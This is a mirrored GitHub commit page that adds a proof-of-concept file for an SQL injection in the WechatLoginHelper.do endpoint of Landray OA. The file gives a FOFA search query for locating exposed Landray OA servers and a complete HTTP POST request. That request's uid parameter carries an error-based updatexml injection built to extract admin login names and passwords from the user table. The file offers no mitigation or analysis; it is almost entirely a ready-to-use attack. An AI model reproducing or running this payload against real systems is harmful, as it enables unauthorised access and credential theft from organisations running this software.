mirror of
https://github.com/wooluo/POC00.git
synced 2026-03-17 20:44:53 +08:00
Create 蓝凌OA-WechatLoginHelper.do存在SQL注入漏洞.md
This commit is contained in:
parent
db0c7ef873
commit
fc6c05d888
19
蓝凌OA-WechatLoginHelper.do存在SQL注入漏洞.md
Normal file
19
蓝凌OA-WechatLoginHelper.do存在SQL注入漏洞.md
Normal file
@ -0,0 +1,19 @@
|
||||
## 蓝凌OA-WechatLoginHelper.do存在SQL注入漏洞
|
||||
|
||||
## fofa
|
||||
```
|
||||
app="Landray-OA系统"
|
||||
```
|
||||
|
||||
## poc
|
||||
```
|
||||
POST /third/wechat/wechatLoginHelper.do HTTP/1.1
|
||||
Host: xxx.xxx.xxx.xxx
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.850.132 Safari/537.36
|
||||
Content-Length: 254
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Accept-Encoding: gzip
|
||||
|
||||
method=edit&openid=&nickname=&image=&uid=123'and updatexml(1,concat('~',(select concat('~',test.fdLoginName,'~',test.fdPassword,'~') from com.landray.kmss.sys.organization.model.SysOrgPerson test where test.fdLoginName like '%25admin12%25'),'~'),1)=1-- '
|
||||
```
|
||||
Loading…
x
Reference in New Issue
Block a user